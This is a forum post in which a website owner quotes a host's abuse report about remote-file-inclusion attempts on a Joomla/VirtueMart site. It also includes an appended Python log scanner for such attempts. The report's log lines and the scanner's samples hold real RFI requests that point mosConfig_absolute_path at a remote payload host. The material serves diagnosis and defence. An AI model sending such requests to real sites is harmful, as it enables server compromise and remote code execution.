URL Injection Attacks

Hi, I just recovered (I think) from the Iframe Injection Attack. Now I have been informed by my host of a URL Injection Attack; I'm not sure if they are related problems or separate, but in any event I need to stop the URL Injection Attack.


From my host:

Hi,

We have received the following abuse report against your account. Please check the vps thoroughly for any vulnerable/suspicious process. Also make sure all scripts installed in your accounts are up to date and accounts passwords are updated regularly (always use strong password, combination of lower/upper case letters, numbers, symbols etc).

Report can be found below. Let us know the steps you have taken to resolve the issue.

--------------------------------------
Greetings:

IP Address of attacker: **.**.***.**

Type of attack: URL Injection -- attempt to inject / load files onto the
server via PHP/CGI vulnerabilities

Sample log report including date and time stamp (1st field is "request", 2nd field is the IP address or the domain name being attacked, and the 3rd field is the IP address or domain name of the attacker):

Request: rieas.gr **.**.***.** - - [12/Sep/2009:08:47:14 -0400] "GET /index.php?option=com_content&task=view&id=572&Itemid=84/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://203.128.246.107:32000/temp//id.gif? HTTP/1.1" 500 3560 "-" "Mozilla/5.0" SquYUkYmP6kAAAIGIss "-"

Request: rieas.gr **.**.***.** - - [12/Sep/2009:08:47:14 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://203.128.246.107:32000/temp//id.gif? HTTP/1.1" 500 3560 "-" "Mozilla/5.0" SquYUkYmP6kAAAH7HFM "-"

Request: rieas.gr **.**.***.** - - [12/Sep/2009:08:47:36 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://203.128.246.107:32000/temp//id.gif? HTTP/1.1" 500 3560 "-" "Mozilla/5.0" SquYaEYmP6kAAAINJmc "-"

Request: rieas.gr **.**.***.** - - [12/Sep/2009:08:47:36 -0400] "GET /index.php?option=com_content&task=view&id=572&Itemid=84/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://203.128.246.107:32000/temp//id.gif? HTTP/1.1" 500 3560 "-" "Mozilla/5.0" SquYaEYmP6kAABP8Plg "-"

Request: rieas.gr **.**.***.** - - [12/Sep/2009:08:47:43 -0400] "GET /index.php?option=com_content&task=view&id=572&Itemid=84/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://203.128.246.107:32000/temp//id.gif? HTTP/1.1" 500 3560 "-" "Mozilla/5.0" SquYb0YmP6kAAAJCJ5Y "-"

Request: rieas.gr **.**.***.** - - [12/Sep/2009:08:47:43 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://203.128.246.107:32000/temp//id.gif? HTTP/1.1" 500 3560 "-" "Mozilla/5.0" SquYb0YmP6kAAAIGItc "-"

Request: rieas.gr **.**.***.** - - [12/Sep/2009:08:47:43 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://203.128.246.107:32000/temp//id.gif? HTTP/1.1" 500 3560 "-" "Mozilla/5.0" SquYb0YmP6kAABP8Plo "-"

Request: rieas.gr **.**.***.** - - [12/Sep/2009:08:47:43 -0400] "GET /index.php?option=com_content&task=view&id=572&Itemid=84/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://203.128.246.107:32000/temp//id.gif? HTTP/1.1" 500 3560 "-" "Mozilla/5.0" SquYb0YmP6kAABP7PWU "-"

Request: rieas.gr **.**.***.** - - [12/Sep/2009:08:47:48 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://203.128.246.107:32000/temp//id.gif? HTTP/1.1" 500 3560 "-" "Mozilla/5.0" SquYdEYmP6kAABP7PWY "-"

Request: rieas.gr **.**.***.** - - [12/Sep/2009:08:47:48 -0400] "GET /index.php?option=com_content&task=view&id=572&Itemid=84/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://203.128.246.107:32000/temp//id.gif? HTTP/1.1" 500 3560 "-" "Mozilla/5.0" SquYdEYmP6kAAAH8H40 "-"

Request: rieas.gr **.**.***.** - - [12/Sep/2009:08:48:47 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://203.128.246.107:32000/temp//id.gif? HTTP/1.1" 500 3560 "-" "Mozilla/5.0" SquYr0YmP6kAAAJHKnQ "-"

Request: rieas.gr **.**.***.** - - [12/Sep/2009:08:48:47 -0400] "GET /index.php?option=com_content&task=view&id=572&Itemid=84/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://203.128.246.107:32000/temp//id.gif? HTTP/1.1" 500 3560 "-" "Mozilla/5.0" SquYr0YmP6kAAAJEKFs "-"

NOTES:

URL Injection attacks typically mean the server for which the IP address of
the attacker is bound is a compromised server.

Please check the server behind the IP address above for suspicious files in /tmp, /var/tmp, /dev/shm, /var/spool/samba, /var/spool/vbox, /var/spool/squid, and /var/spool/cron. Please use "ls -lab" for checking directories as sometimes compromised servers will have hidden files that a regular "ls" will not show.

Please also check the process tree (ps -efl or ps -auwx) for suspicious
processes; often times the malware / hack pretends to be an Apache process.

Clam Anti-virus, clamscan, can also be used to find commonly used PHP and Perl-based hacks, including various php shells, on a server using the "--infected" and "--recursive" options.

You may also want to check out using root kit detection tools - http://www.chkrootkit.org/, http://www.rootkit.nl/, and http://www.ossec.net/en/rootcheck.html - as tools which should be used in addition to checking the directories and process tree.

### EOF NOTES ###

Please take appropriate action to stop these attacks from happening.

Thank you very much for your time.
Any suggestions?
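As an added example (not code from the original post or the host's report), here is a small Python detector for the remote-file-inclusion pattern visible in those log lines: a query parameter whose value is itself a URL, here `mosConfig_absolute_path` pointing at 203.128.246.107. The log lines it scans are constructed to mirror the report's format; the client addresses 192.0.2.10 and 198.51.100.7 are documentation-range placeholders for the redacted IP, and the request IDs are made up.

```python
"""Flag remote-file-inclusion (RFI) attempts in access logs shaped like the abuse report.
SAMPLE_LOG is constructed: the client IPs are documentation-range placeholders."""
import re
from urllib.parse import unquote, urlsplit

SAMPLE_LOG = """\
Request: rieas.gr 198.51.100.7 - - [12/Sep/2009:08:46:02 -0400] "GET /index.php?option=com_content&task=view&id=572&Itemid=84 HTTP/1.1" 200 18211 "-" "Mozilla/5.0" SqAAAAAAAAAAAAAAAAAA "-"
Request: rieas.gr 192.0.2.10 - - [12/Sep/2009:08:47:14 -0400] "GET /index.php?option=com_content&task=view&id=572&Itemid=84/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://203.128.246.107:32000/temp//id.gif? HTTP/1.1" 500 3560 "-" "Mozilla/5.0" SqBBBBBBBBBBBBBBBBBB "-"
Request: rieas.gr 192.0.2.10 - - [12/Sep/2009:08:47:14 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://203.128.246.107:32000/temp//id.gif? HTTP/1.1" 500 3560 "-" "Mozilla/5.0" SqCCCCCCCCCCCCCCCCCC "-"
"""

# Shape of the report's lines: vhost, client, two "-" fields, [time], "METHOD target HTTP/x", status.
LOG_RE = re.compile(
    r'^Request:\s+(?P<vhost>\S+)\s+(?P<client>\S+)\s+\S+\s+\S+\s+\[(?P<time>[^\]]+)\]'
    r'\s+"(?P<method>[A-Z]+)\s+(?P<target>\S+)\s+HTTP/[\d.]+"\s+(?P<status>\d{3})'
)
# A parameter value that is itself a URL is the RFI signature: the script is being
# pointed at code on a remote machine instead of a local path.
URL_VALUE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# Parameter names known to be abused this way in old Joomla/Mambo components.
KNOWN_RFI_PARAMS = {"mosconfig_absolute_path"}

def rfi_values(target: str) -> list:
    """Return (param, value) pairs whose value is a remote URL. Splitting on both
    '?' and '&' means a second '?' smuggled into the Itemid value
    (Itemid=84/administrator/...export.php?mosConfig_absolute_path=...) is still seen."""
    hits = []
    _, _, query = target.partition("?")
    for chunk in re.split(r"[?&]", query):
        if "=" not in chunk:
            continue
        name, value = (unquote(part) for part in chunk.split("=", 1))
        if URL_VALUE_RE.match(value) or name.lower() in KNOWN_RFI_PARAMS:
            hits.append((name, value))
    return hits

def scan(log_text: str) -> list:
    """Parse each line and keep only the entries that carry an RFI attempt."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not in the report's format; skip rather than guess
        hits = rfi_values(m["target"])
        if hits:
            hosts = {urlsplit(v).hostname for _, v in hits} - {None}
            findings.append({"client": m["client"], "time": m["time"],
                             "status": int(m["status"]), "params": hits,
                             "remote_hosts": sorted(hosts)})  # where the payload is hosted
    return findings

FINDINGS = scan(SAMPLE_LOG)  # the two attack lines; the benign index.php hit is not flagged
```

The `remote_hosts` field is what the abuse desk is pointing at in its notes: the machine serving the payload is usually itself compromised, so a 500 response on your side still means the request should be blocked and the vulnerable component updated.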
